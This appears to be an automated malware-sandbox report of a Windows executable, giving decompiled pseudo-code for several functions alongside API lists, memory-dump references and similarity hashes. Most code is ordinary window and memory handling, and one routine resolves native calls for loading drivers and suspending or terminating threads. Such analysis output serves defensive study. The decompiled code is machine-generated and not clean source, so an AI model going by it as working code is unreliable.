				_t138 = 5;
				_t128 = 4;
				_t87 = _t138 * _t128;
				 *((intOrPtr*)(_t131 + 0x48)) = 1;
				 *(_t131 + 0x2c) = _t138;
				 *((intOrPtr*)(_t131 + 0x28)) = 0x20;
				_push( ~(0 | _t146 > 0x00000000) | _t87);
				L0040B26C();
				_push(0xc);
				 *(_t131 + 0x30) = _t87;
				L0040B26C();
				_t139 = _t87;
				if(_t87 == 0) {
					_t88 = 0;
					__eflags = 0;
				} else {
					_t88 = E00406607(_a4,  *((intOrPtr*)(_t131 + 0x58)), _t139);
				}
				 *((intOrPtr*)(_t131 + 0x2c0)) = _t88;
				 *((intOrPtr*)(_t131 + 0x4c)) = 1;
				 *((intOrPtr*)(_t131 + 0x50)) = 0;
				 *((intOrPtr*)(_t131 + 0x2b4)) = 1;
				 *((intOrPtr*)(_t131 + 0x2b8)) = 0;
				 *((intOrPtr*)(_t131 + 0x2bc)) = 0;
				 *((intOrPtr*)(_t131 + 0x2c4)) = 1;
				 *((intOrPtr*)(_t131 + 0x2c8)) = 1;
				 *((intOrPtr*)(_t131 + 0x334)) = 0x32;
				 *((intOrPtr*)(_t131 + 0x5c)) = 0xffffff;
				return E0040686C(_t131);
			}

APIs

Part of subcall function 00406746: ??3@YAXPAX@Z.MSVCRT ref: 00406752
Part of subcall function 00406746: ??3@YAXPAX@Z.MSVCRT ref: 00406760
Part of subcall function 00406746: ??3@YAXPAX@Z.MSVCRT ref: 00406771
Part of subcall function 00406746: ??3@YAXPAX@Z.MSVCRT ref: 00406788
Part of subcall function 00406746: ??3@YAXPAX@Z.MSVCRT ref: 00406791

??2@YAPAXI@Z.MSVCRT ref: 0040692E
??2@YAPAXI@Z.MSVCRT ref: 0040694A
memcpy.MSVCRT ref: 0040696D
memcpy.MSVCRT ref: 0040697E
??2@YAPAXI@Z.MSVCRT ref: 00406A01
??2@YAPAXI@Z.MSVCRT ref: 00406A0B

Part of subcall function 00405B81: GetModuleHandleW.KERNEL32(00000000,?,?,00403490), ref: 00405BC0
Part of subcall function 00405B81: LoadStringW.USER32(00000000,000001F5,?), ref: 00405C59
Part of subcall function 00405B81: memcpy.MSVCRT ref: 00405C99

Part of subcall function 00405B81: wcscpy.MSVCRT ref: 00405C02
Part of subcall function 00405B81: wcslen.MSVCRT ref: 00405C20
Part of subcall function 00405B81: GetModuleHandleW.KERNEL32(00000000,?,?,?,00403490), ref: 00405C2E

Memory Dump Source

Source File: 0000000E.00000002.330305170.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.330294048.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.330323781.000000000040C000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.330340002.000000000040F000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.330350884.000000000041D000.00000002.00020000.sdmp Download File

Similarity

API ID: ??3@$??2@$memcpy$HandleModule$LoadStringwcscpywcslen
String ID:
API String ID: 975042529-0
Opcode ID: 7b5c259927b59544c1da32c87fb64e8a434fc950baf11122839f6010e947eddb
Instruction ID: 1f3882e7c97b8b8272a376ef7761bc0b0e9511dafd47f947fc31f4e13e233f39
Opcode Fuzzy Hash: 7b5c259927b59544c1da32c87fb64e8a434fc950baf11122839f6010e947eddb
Instruction Fuzzy Hash: 53414EB1B01715AFD718DF39C88A75AFBA4FB08314F10422FE519D7691D775A8108BC8

Uniqueness

Uniqueness Score: -1.00%

Function 004097A9, Relevance: 7.6, APIs: 5, Instructions: 112
COMMON

Download Yara Rule

C-Code - Quality: 83%

			E004097A9(void* __ecx, void* __edx, void* __eflags, intOrPtr _a4) {
				int _v8;
				int _v12;
				intOrPtr _v16;
				void* _v20;
				int _v24;
				void _v56;
				char _v584;
				char _v588;
				char _v41548;
				void* __edi;
				void* _t40;
				void _t46;
				intOrPtr _t47;
				intOrPtr* _t64;
				intOrPtr* _t66;
				intOrPtr _t67;
				intOrPtr _t71;
				int _t77;
				void* _t80;
				void* _t81;
				void* _t82;
				void* _t83;

				E0040B550(0xa248, __ecx);
				_t77 = 0;
				_v8 = 0;
				E00408E31();
				_t40 =  *0x41c47c;
				if(_t40 != 0) {
					_t40 =  *_t40(5,  &_v41548, 0xa000,  &_v8);
				}
				if(_v8 == _t77) {
					_v8 = 0x186a0;
				}
				_v8 = _v8 + 0x3e80;
				_push(_v8);
				L0040B26C();
				_t81 = _t40;
				_v20 = _t81;
				memset(_t81, _t77, _v8);
				_t83 = _t82 + 0x10;
				_v24 = _t77;
				E00408E31();
				E00408F2A(0x41c47c, _t81, _v8,  &_v24);
				L5:
				while(1) {
					if( *((intOrPtr*)(_t81 + 0x3c)) == _t77) {
						L16:
						_t46 =  *_t81;
						_t77 = 0;
						if(_t46 == 0) {
							_push(_v20);
							L0040B272();
							return _t46;
						}
						_t81 = _t81 + _t46;
						continue;
					}
					_t47 = _a4;
					_t71 =  *((intOrPtr*)(_t47 + 0x34));
					_v12 = _t77;
					_v16 = _t71;
					if(_t71 <= _t77) {
						L10:
						_t66 = 0;
						L11:
						if(_t66 == 0) {
							E004090AF( &_v588);
							E00404923(0x104,  &_v584,  *((intOrPtr*)(_t81 + 0x3c)));
							_t32 = _t81 + 0x20; // 0x20
							memcpy( &_v56, _t32, 8);
							_t83 = _t83 + 0x10;
							E004099ED(_a4 + 0x28,  &_v588);
						} else {
							_t26 = _t66 + 4; // 0x4
							_t72 = _t26;
							if( *_t26 == 0) {
								E00404923(0x104, _t72,  *((intOrPtr*)(_t81 + 0x3c)));
								_t28 = _t81 + 0x20; // 0x20
								memcpy(_t66 + 0x214, _t28, 8);
								_t83 = _t83 + 0x10;
							}
						}
						goto L16;
					}
					_t67 =  *((intOrPtr*)(_t81 + 0x44));
					_t80 = _t47 + 0x28;
					while(1) {
						_t64 = E00405A92(_v12, _t80);
						if( *_t64 == _t67) {
							break;
						}
						_v12 = _v12 + 1;
						if(_v12 < _v16) {
							continue;
						}
						goto L10;
					}
					_t66 = _t64;
					goto L11;
				}
			}

APIs

Part of subcall function 00408E31: GetModuleHandleW.KERNEL32(ntdll.dll,?,004097C3), ref: 00408E44
Part of subcall function 00408E31: GetProcAddress.KERNEL32(00000000,NtQuerySystemInformation), ref: 00408E5B
Part of subcall function 00408E31: GetProcAddress.KERNEL32(NtLoadDriver), ref: 00408E6D
Part of subcall function 00408E31: GetProcAddress.KERNEL32(NtUnloadDriver), ref: 00408E7F
Part of subcall function 00408E31: GetProcAddress.KERNEL32(NtOpenSymbolicLinkObject), ref: 00408E91
Part of subcall function 00408E31: GetProcAddress.KERNEL32(NtQuerySymbolicLinkObject), ref: 00408EA3
Part of subcall function 00408E31: GetProcAddress.KERNEL32(NtQueryObject), ref: 00408EB5
Part of subcall function 00408E31: GetProcAddress.KERNEL32(NtOpenThread), ref: 00408EC7
Part of subcall function 00408E31: GetProcAddress.KERNEL32(NtClose), ref: 00408ED9
Part of subcall function 00408E31: GetProcAddress.KERNEL32(NtQueryInformationThread), ref: 00408EEB
Part of subcall function 00408E31: GetProcAddress.KERNEL32(NtSuspendThread), ref: 00408EFD
Part of subcall function 00408E31: GetProcAddress.KERNEL32(NtResumeThread), ref: 00408F0F
Part of subcall function 00408E31: GetProcAddress.KERNEL32(NtTerminateThread), ref: 00408F21

??2@YAPAXI@Z.MSVCRT ref: 004097F6
memset.MSVCRT ref: 00409805
memcpy.MSVCRT ref: 0040988A
memcpy.MSVCRT ref: 004098C0
??3@YAXPAX@Z.MSVCRT ref: 004098EC

Memory Dump Source

Source File: 0000000E.00000002.330305170.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.330294048.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.330323781.000000000040C000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.330340002.000000000040F000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.330350884.000000000041D000.00000002.00020000.sdmp Download File

Similarity

API ID: AddressProc$memcpy$??2@??3@HandleModulememset
String ID:
API String ID: 3641025914-0
Opcode ID: 5e4299bbf46472c45a4c6d50f6a05ce4ddc252402b4fb65f630eed7603d777c4
Instruction ID: bb54f3dbfe595cb11ae02f9551d523dabe65b88657fa4b418f7fa82d5da08bd9
Opcode Fuzzy Hash: 5e4299bbf46472c45a4c6d50f6a05ce4ddc252402b4fb65f630eed7603d777c4
Instruction Fuzzy Hash: BF41C172900209EFDB10EBA5C8819AEB3B9EF45304F14847FE545B3292DB78AE41CB59

Uniqueness

Uniqueness Score: -1.00%

Function 004067AC, Relevance: 7.6, APIs: 5, Instructions: 60
COMMON

Download Yara Rule

C-Code - Quality: 68%

			E004067AC(char** __edi) {
				void* __esi;
				void* _t9;
				void** _t11;
				char** _t15;
				char** _t24;
				void* _t25;
				char* _t28;
				char* _t29;
				char* _t30;
				char* _t31;
				char** _t33;

				_t24 = __edi;
				 *__edi = "cf@";
				_t9 = E00406746(__edi);
				_t28 = __edi[5];
				if(_t28 != 0) {
					_t9 = E004055D1(_t9, _t28);
					_push(_t28);
					L0040B272();
				}
				_t29 = _t24[4];
				if(_t29 != 0) {
					_t9 = E004055D1(_t9, _t29);
					_push(_t29);
					L0040B272();
				}
				_t30 = _t24[3];
				if(_t30 != 0) {
					_t9 = E004055D1(_t9, _t30);
					_push(_t30);
					L0040B272();
				}
				_t31 = _t24[2];
				if(_t31 != 0) {
					E004055D1(_t9, _t31);
					_push(_t31);
					L0040B272();
				}
				_t15 = _t24;
				_pop(_t32);
				_push(_t24);
				_t33 = _t15;
				_t25 = 0;
				if(_t33[1] > 0 && _t33[0xd] > 0) {
					do {
						 *((intOrPtr*)( *((intOrPtr*)(E0040664E(_t33, _t25))) + 0xc))();
						_t25 = _t25 + 1;
					} while (_t25 < _t33[0xd]);
				}
				_t11 =  *( *_t33)();
				free( *_t11);
				return _t11;
			}

APIs

Part of subcall function 00406746: ??3@YAXPAX@Z.MSVCRT ref: 00406752
Part of subcall function 00406746: ??3@YAXPAX@Z.MSVCRT ref: 00406760
Part of subcall function 00406746: ??3@YAXPAX@Z.MSVCRT ref: 00406771
Part of subcall function 00406746: ??3@YAXPAX@Z.MSVCRT ref: 00406788
Part of subcall function 00406746: ??3@YAXPAX@Z.MSVCRT ref: 00406791

??3@YAXPAX@Z.MSVCRT ref: 004067C7
??3@YAXPAX@Z.MSVCRT ref: 004067DA
??3@YAXPAX@Z.MSVCRT ref: 004067ED
??3@YAXPAX@Z.MSVCRT ref: 00406800
free.MSVCRT(00000000), ref: 00406839

Part of subcall function 004055D1: free.MSVCRT(?,00405843,00000000,?,00000000), ref: 004055DA

Memory Dump Source

Source File: 0000000E.00000002.330305170.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.330294048.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.330323781.000000000040C000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.330340002.000000000040F000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.330350884.000000000041D000.00000002.00020000.sdmp Download File

Similarity

API ID: ??3@$free
String ID:
API String ID: 2241099983-0
Opcode ID: fae72e90abf19a0f598a0744b86edfa2e5e81d8d411ebeda80197a1c121c0671
Instruction ID: 35b4881f8254e3ed5d778deec4dde62c4732b660dc94e1daad4ca6c431b67ac1
Opcode Fuzzy Hash: fae72e90abf19a0f598a0744b86edfa2e5e81d8d411ebeda80197a1c121c0671
Instruction Fuzzy Hash: 4E010233902D209BCA217B2A950541FB395FE82B24316807FE802772C5CF38AC618AED

Uniqueness

Uniqueness Score: -1.00%

Function 00405CF8, Relevance: 7.5, APIs: 5, Instructions: 49
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00405CF8(void* __esi, struct HWND__* _a4, signed int _a8) {
				intOrPtr _v12;
				struct tagPOINT _v20;
				struct tagRECT _v36;
				int _t27;
				struct HWND__* _t30;
				struct HWND__* _t32;

				_t30 = _a4;
				if((_a8 & 0x00000001) != 0) {
					_t32 = GetParent(_t30);
					GetWindowRect(_t30,  &_v20);
					GetClientRect(_t32,  &_v36);
					MapWindowPoints(0, _t32,  &_v20, 2);
					_t27 = _v36.right - _v12 - _v36.left;
					_v20.x = _t27;
					SetWindowPos(_t30, 0, _t27, _v20.y, 0, 0, 5);
				}
				if((_a8 & 0x00000002) != 0) {
					E00404FBB(_t30);
				}
				return 1;
			}

0x00405d03
0x00405d06
0x00405d10
0x00405d17
0x00405d22
0x00405d32
0x00405d40
0x00405d48
0x00405d4e
0x00405d54
0x00405d59
0x00405d5c
0x00405d61
0x00405d67

APIs

GetParent.USER32(?), ref: 00405D0A
GetWindowRect.USER32 ref: 00405D17
GetClientRect.USER32 ref: 00405D22
MapWindowPoints.USER32 ref: 00405D32
SetWindowPos.USER32(?,00000000,?,00000001,00000000,00000000,00000005), ref: 00405D4E

Memory Dump Source

Source File: 0000000E.00000002.330305170.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.330294048.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.330323781.000000000040C000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.330340002.000000000040F000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.330350884.000000000041D000.00000002.00020000.sdmp Download File

Similarity

API ID: Window$Rect$ClientParentPoints
String ID:
API String ID: 4247780290-0
Opcode ID: a641cd19a410ed6a125ee0f2f41aa3775212a32dac042a11be58197803c42fc2
Instruction ID: c328b93d85e4c90ccc2b92edbac8192aeb41fc184e748709fb0c9a3f9f2b3a5a
Opcode Fuzzy Hash: a641cd19a410ed6a125ee0f2f41aa3775212a32dac042a11be58197803c42fc2
Instruction Fuzzy Hash: 41012932801029BBDB119BA59D8DEFFBFBCEF46750F04822AF901A2151D73895028BA5

Uniqueness

Uniqueness Score: -1.00%

Function 004083DC, Relevance: 7.5, APIs: 5, Instructions: 47
COMMON

Download Yara Rule

C-Code - Quality: 89%

			E004083DC(void* __eax, int __ebx, void* _a4) {
				signed int _v8;
				signed int _v12;
				void* _v16;
				void* _t20;
				void* _t21;
				signed int _t28;
				void* _t32;
				void* _t34;

				_t20 = __eax;
				_v12 = _v12 & 0x00000000;
				_push(__ebx);
				_t28 = __eax - 1;
				L0040B26C();
				_v16 = __eax;
				if(_t28 > 0) {
					_t21 = _a4;
					_v8 = __ebx;
					_v8 =  ~_v8;
					_t32 = _t28 * __ebx + _t21;
					_a4 = _t21;
					do {
						memcpy(_v16, _a4, __ebx);
						memcpy(_a4, _t32, __ebx);
						_t20 = memcpy(_t32, _v16, __ebx);
						_a4 = _a4 + __ebx;
						_t32 = _t32 + _v8;
						_t34 = _t34 + 0x24;
						_v12 = _v12 + 1;
						_t28 = _t28 - 1;
					} while (_t28 > _v12);
				}
				_push(_v16);
				L0040B272();
				return _t20;
			}

APIs

??2@YAPAXI@Z.MSVCRT ref: 004083EB
memcpy.MSVCRT ref: 00408413
memcpy.MSVCRT ref: 0040841D
memcpy.MSVCRT ref: 00408427
??3@YAXPAX@Z.MSVCRT ref: 00408442

Memory Dump Source

Source File: 0000000E.00000002.330305170.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.330294048.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.330323781.000000000040C000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.330340002.000000000040F000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.330350884.000000000041D000.00000002.00020000.sdmp Download File

Similarity

API ID: memcpy$??2@??3@
String ID:
API String ID: 1252195045-0
Opcode ID: ae14ed78cb3b9c7a1656bdd7c9bb9ccf218141e25ab2435f791856beeb738110
Instruction ID: 529a25ebd12540bef40c4bbbf5f662c822a20cdbd1f214c79cf6c3b5efc5d95d
Opcode Fuzzy Hash: ae14ed78cb3b9c7a1656bdd7c9bb9ccf218141e25ab2435f791856beeb738110
Instruction Fuzzy Hash: 61017176C0410CBBCF006F99D8859DEBBB8EF40394F1080BEF80476161D7355E519B98

Uniqueness

Uniqueness Score: -1.00%

Function 00406746, Relevance: 7.5, APIs: 5, Instructions: 41
COMMON

Download Yara Rule

C-Code - Quality: 76%

			E00406746(void* __esi) {
				intOrPtr _t9;
				intOrPtr _t10;
				intOrPtr _t11;
				intOrPtr* _t18;
				void* _t19;

				_t19 = __esi;
				_t9 =  *((intOrPtr*)(__esi + 0x30));
				if(_t9 != 0) {
					_push(_t9);
					L0040B272();
				}
				_t10 =  *((intOrPtr*)(_t19 + 0x40));
				if(_t10 != 0) {
					_push(_t10);
					L0040B272();
				}
				_t11 =  *((intOrPtr*)(_t19 + 0x2d4));
				if(_t11 != 0) {
					_push(_t11);
					L0040B272();
				}
				_t18 =  *((intOrPtr*)(_t19 + 0x2c0));
				if(_t18 != 0) {
					_t11 =  *_t18;
					if(_t11 != 0) {
						_push(_t11);
						L0040B272();
						 *_t18 = 0;
					}
					_push(_t18);
					L0040B272();
				}
				 *((intOrPtr*)(_t19 + 0x2c0)) = 0;
				 *((intOrPtr*)(_t19 + 0x30)) = 0;
				 *((intOrPtr*)(_t19 + 0x40)) = 0;
				 *((intOrPtr*)(_t19 + 0x2d4)) = 0;
				return _t11;
			}

APIs

??3@YAXPAX@Z.MSVCRT ref: 00406752
??3@YAXPAX@Z.MSVCRT ref: 00406760
??3@YAXPAX@Z.MSVCRT ref: 00406771
??3@YAXPAX@Z.MSVCRT ref: 00406788
??3@YAXPAX@Z.MSVCRT ref: 00406791

Memory Dump Source

Source File: 0000000E.00000002.330305170.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.330294048.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.330323781.000000000040C000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.330340002.000000000040F000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.330350884.000000000041D000.00000002.00020000.sdmp Download File

Similarity

API ID: ??3@
String ID:
API String ID: 613200358-0
Opcode ID: 086bdf89973be9db751c02ba5940a011d1fc21caf14060528ff21e4da5d0ecd6
Instruction ID: 2146815d826ad61a6329a34e2799f13692f9223f7a0132405705f454cb51ab02
Opcode Fuzzy Hash: 086bdf89973be9db751c02ba5940a011d1fc21caf14060528ff21e4da5d0ecd6
Instruction Fuzzy Hash: E1F0ECB2504701DBDB24AE7D99C881FA7E9BB05318B65087FF14AE3680C738B850461C

Uniqueness

Uniqueness Score: -1.00%

Function 0040ABA5, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 71
COMMON

Download Yara Rule

C-Code - Quality: 87%

			E0040ABA5(intOrPtr __ecx, void* __edi, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				struct HDWP__* _v8;
				intOrPtr _v12;
				void* __ebx;
				intOrPtr _t37;
				intOrPtr _t42;
				RECT* _t44;

				_push(__ecx);
				_push(__ecx);
				_t42 = __ecx;
				_v12 = __ecx;
				if(_a4 != 5) {
					if(_a4 != 0xf) {
						if(_a4 == 0x24) {
							_t37 = _a12;
							 *((intOrPtr*)(_t37 + 0x18)) = 0xc8;
							 *((intOrPtr*)(_t37 + 0x1c)) = 0xc8;
						}
					} else {
						E00402EC8(__ecx + 0x378);
					}
				} else {
					_v8 = BeginDeferWindowPos(3);
					_t44 = _t42 + 0x378;
					E00402E22(_t44, _t21, 0x65, 0, 0, 1, 1);
					E00402E22(_t44, _v8, 1, 1, 1, 0, 0);
					E00402E22(_t44, _v8, 2, 1, 1, 0, 0);
					EndDeferWindowPos(_v8);
					InvalidateRect( *(_t44 + 0x10), _t44, 1);
					_t42 = _v12;
				}
				return E00402CED(_t42, _a4, _a8, _a12);
			}

APIs

BeginDeferWindowPos.USER32 ref: 0040ABBA

Part of subcall function 00402E22: GetDlgItem.USER32 ref: 00402E32
Part of subcall function 00402E22: GetClientRect.USER32 ref: 00402E44
Part of subcall function 00402E22: DeferWindowPos.USER32(?,?,00000000,?,?,?,?,00000004), ref: 00402EB4

EndDeferWindowPos.USER32(?), ref: 0040ABFE
InvalidateRect.USER32(?,?,00000001), ref: 0040AC09

Strings

$, xrefs: 0040AC28

Memory Dump Source

Source File: 0000000E.00000002.330305170.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.330294048.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.330323781.000000000040C000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.330340002.000000000040F000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.330350884.000000000041D000.00000002.00020000.sdmp Download File

Similarity

API ID: DeferWindow$Rect$BeginClientInvalidateItem
String ID: $
API String ID: 2498372239-3993045852
Opcode ID: 3646c4f7f2df3bce7363561434de74107494107a1dc9a7f0debf38e758269ced
Instruction ID: c4de0c57513a3fc8bb763215dcca23c205eee760976c5819edcd99f4220bed98
Opcode Fuzzy Hash: 3646c4f7f2df3bce7363561434de74107494107a1dc9a7f0debf38e758269ced
Instruction Fuzzy Hash: 9A11ACB1544208FFEB229F51CD88DAF7A7CEB85788F10403EF8057A280C6758E52DBA5

Uniqueness

Uniqueness Score: -1.00%

Function 00403A73, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 54
keyboardwindowCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00403A73(void* __esi, struct HWND__* _a4, int _a8, int _a12, long _a16) {
				int _t14;

				if(_a8 == 0x100 && _a12 == 0x41) {
					GetKeyState(0xa2);
					if(E00403A60(0xa2) != 0 || E00403A60(0xa3) != 0) {
						if(E00403A60(0xa0) == 0 && E00403A60(0xa1) == 0 && E00403A60(0xa4) == 0) {
							_t14 = E00403A60(0xa5);
							if(_t14 == 0) {
								SendMessageW(_a4, 0xb1, _t14, 0xffffffff);
							}
						}
					}
				}
				return CallWindowProcW( *0x40f2f0, _a4, _a8, _a12, _a16);
			}

0x00403a7d
0x00403a8c
0x00403a9c
0x00403aba
0x00403adf
0x00403ae7
0x00403af4
0x00403af4
0x00403ae7
0x00403aba
0x00403a9c
0x00403b13

APIs

GetKeyState.USER32(000000A2), ref: 00403A8C

Part of subcall function 00403A60: GetKeyState.USER32(?), ref: 00403A64

SendMessageW.USER32(?,000000B1,00000000,000000FF), ref: 00403AF4
CallWindowProcW.USER32(?,00000100,?,?), ref: 00403B0C

Strings

A, xrefs: 00403A7F

Memory Dump Source

Source File: 0000000E.00000002.330305170.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.330294048.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.330323781.000000000040C000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.330340002.000000000040F000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.330350884.000000000041D000.00000002.00020000.sdmp Download File

Similarity

API ID: State$CallMessageProcSendWindow
String ID: A
API String ID: 3924021322-3554254475
Opcode ID: 7a91954c753d57b62ada695ad1095f0bf88fde31d04a203a00175be824b18610
Instruction ID: 3f4bab65c8f2f559ff61c6136e8e970ba349fdfc906a465d58382778652fa82c
Opcode Fuzzy Hash: 7a91954c753d57b62ada695ad1095f0bf88fde31d04a203a00175be824b18610
Instruction Fuzzy Hash: AC01483130430AAEFF11DFE59D02ADA3A5CAF15327F114036FA96B81D1DBB887506E59

Uniqueness

Uniqueness Score: -1.00%

Function 004034F0, Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 51
COMMON

Download Yara Rule

C-Code - Quality: 91%

			E004034F0(void* __ecx, void* __eflags, intOrPtr* _a4) {
				intOrPtr _v20;
				char _v1072;
				void _v3672;
				char _v4496;
				intOrPtr _v4556;
				char _v4560;
				void* __edi;
				void* __esi;
				intOrPtr* _t41;
				void* _t45;

				_t45 = __eflags;
				E0040B550(0x11cc, __ecx);
				E00402923( &_v4560);
				_v4560 = 0x40db44;
				E00406670( &_v4496, _t45);
				_v4496 = 0x40dab0;
				memset( &_v3672, 0, 0x10);
				E0040A909( &_v1072);
				_t41 = _a4;
				_v4556 = 0x71;
				if(E00402CD5( &_v4560,  *((intOrPtr*)(_t41 + 0x10))) != 0) {
					L0040B266();
					 *((intOrPtr*)( *_t41 + 4))(1, _v20, _t41 + 0x5b2c, 0xa);
				}
				_v4496 = 0x40dab0;
				_v4560 = 0x40db44;
				E004067AC( &_v4496);
				return E00402940( &_v4560);
			}

0x004034f0
0x004034f8
0x00403506
0x00403516
0x0040351c
0x00403531
0x00403537
0x00403545
0x0040354a
0x00403556
0x00403567
0x00403575
0x00403583
0x00403583
0x00403586
0x00403592
0x00403598
0x004035ac

APIs

Part of subcall function 00402923: memset.MSVCRT ref: 00402935

Part of subcall function 00406670: ??2@YAPAXI@Z.MSVCRT ref: 004066B9
Part of subcall function 00406670: ??2@YAPAXI@Z.MSVCRT ref: 004066E0
Part of subcall function 00406670: ??2@YAPAXI@Z.MSVCRT ref: 00406701
Part of subcall function 00406670: ??2@YAPAXI@Z.MSVCRT ref: 00406722

memset.MSVCRT ref: 00403537
_ultow.MSVCRT ref: 00403575

Strings

q, xrefs: 00403556
cf@, xrefs: 0040352B

Memory Dump Source

Source File: 0000000E.00000002.330305170.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.330294048.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.330323781.000000000040C000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.330340002.000000000040F000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.330350884.000000000041D000.00000002.00020000.sdmp Download File

Similarity

API ID: ??2@$memset$_ultow
String ID: cf@$q
API String ID: 3448780718-2693627795
Opcode ID: 5a770fb105266b5f281bf636f392918a38755f6c8491aba89f246a667f584aac
Instruction ID: aa1ed1bb2df2d11c17fc3d40a8ec787ac421495c908f782690464d4e039b4fd8
Opcode Fuzzy Hash: 5a770fb105266b5f281bf636f392918a38755f6c8491aba89f246a667f584aac
Instruction Fuzzy Hash: 73113079A402186ACB24AB55DC41BCDB7B4AF45304F0084BAEB09771C1D7796E888FD8

Uniqueness

Uniqueness Score: -1.00%

Function 00402F31, Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 47
COMMON

Download Yara Rule

C-Code - Quality: 83%

			E00402F31(void* _a4) {
				void _v530;
				long _v532;
				void* __edi;
				wchar_t* _t15;
				intOrPtr _t18;
				short* _t19;
				void* _t29;

				_v532 = _v532 & 0x00000000;
				memset( &_v530, 0, 0x208);
				E00404AD9( &_v532);
				_t15 = wcsrchr( &_v532, 0x2e);
				if(_t15 != 0) {
					 *_t15 =  *_t15 & 0x00000000;
				}
				wcscat( &_v532, L".cfg");
				_t18 =  *0x40fa74; // 0x4101c8
				_t19 = _t18 + 0x5504;
				_t36 =  *_t19;
				_pop(_t29);
				if( *_t19 != 0) {
					E00404923(0x104,  &_v532, _t19);
					_pop(_t29);
				}
				return E00402FC6(_t29, _t36,  &_v532);
			}

0x00402f3a
0x00402f51
0x00402f60
0x00402f6f
0x00402f78
0x00402f7a
0x00402f7a
0x00402f8a
0x00402f8f
0x00402f94
0x00402f99
0x00402f9e
0x00402f9f
0x00402fad
0x00402fb2
0x00402fb2
0x00402fc5

APIs

memset.MSVCRT ref: 00402F51

Part of subcall function 00404AD9: GetModuleFileNameW.KERNEL32(00000000,e/@,00000104,00402F65,00000000,?,?,00000000), ref: 00404AE4

wcsrchr.MSVCRT ref: 00402F6F
wcscat.MSVCRT ref: 00402F8A

Strings

.cfg, xrefs: 00402F84

Memory Dump Source

Source File: 0000000E.00000002.330305170.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.330294048.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.330323781.000000000040C000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.330340002.000000000040F000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.330350884.000000000041D000.00000002.00020000.sdmp Download File

Similarity

API ID: FileModuleNamememsetwcscatwcsrchr
String ID: .cfg
API String ID: 776488737-3410578098
Opcode ID: 728259185716957c59a96a9101d5f0e08b84084941d0fa3c3d1a3b0935b5c9f5
Instruction ID: 9e44addaa5645187fa8e636e844442f878cb26b9c6a589516f43c5b5973a5f2a
Opcode Fuzzy Hash: 728259185716957c59a96a9101d5f0e08b84084941d0fa3c3d1a3b0935b5c9f5
Instruction Fuzzy Hash: D501487254420C9ADB20E755DD8AFCA73BCEB54314F1008BBA514F61C1D7F8AAC48A9C

Uniqueness

Uniqueness Score: -1.00%

Function 00407E24, Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 43
COMMON

Download Yara Rule

C-Code - Quality: 64%

			E00407E24(intOrPtr* __ecx, intOrPtr _a4) {
				void _v514;
				signed short _v516;
				void _v1026;
				signed short _v1028;
				void* __esi;
				void* _t17;
				intOrPtr* _t26;
				signed short* _t28;

				_v516 = _v516 & 0x00000000;
				_t26 = __ecx;
				memset( &_v514, 0, 0x1fc);
				_v1028 = _v1028 & 0x00000000;
				memset( &_v1026, 0, 0x1fc);
				_t17 =  *((intOrPtr*)( *_t26 + 0x24))();
				_t28 =  &_v516;
				E00407250(_t28, _t17);
				_push(_t28);
				_push(L"</%s>\r\n");
				_push(0xff);
				_push( &_v1028);
				L0040B1EC();
				return E00407343(_t26, _a4,  &_v1028);
			}

0x00407e2d
0x00407e46
0x00407e48
0x00407e4d
0x00407e5f
0x00407e6b
0x00407e6f
0x00407e75
0x00407e7c
0x00407e7d
0x00407e88
0x00407e8d
0x00407e8e
0x00407eaa

APIs

memset.MSVCRT ref: 00407E48
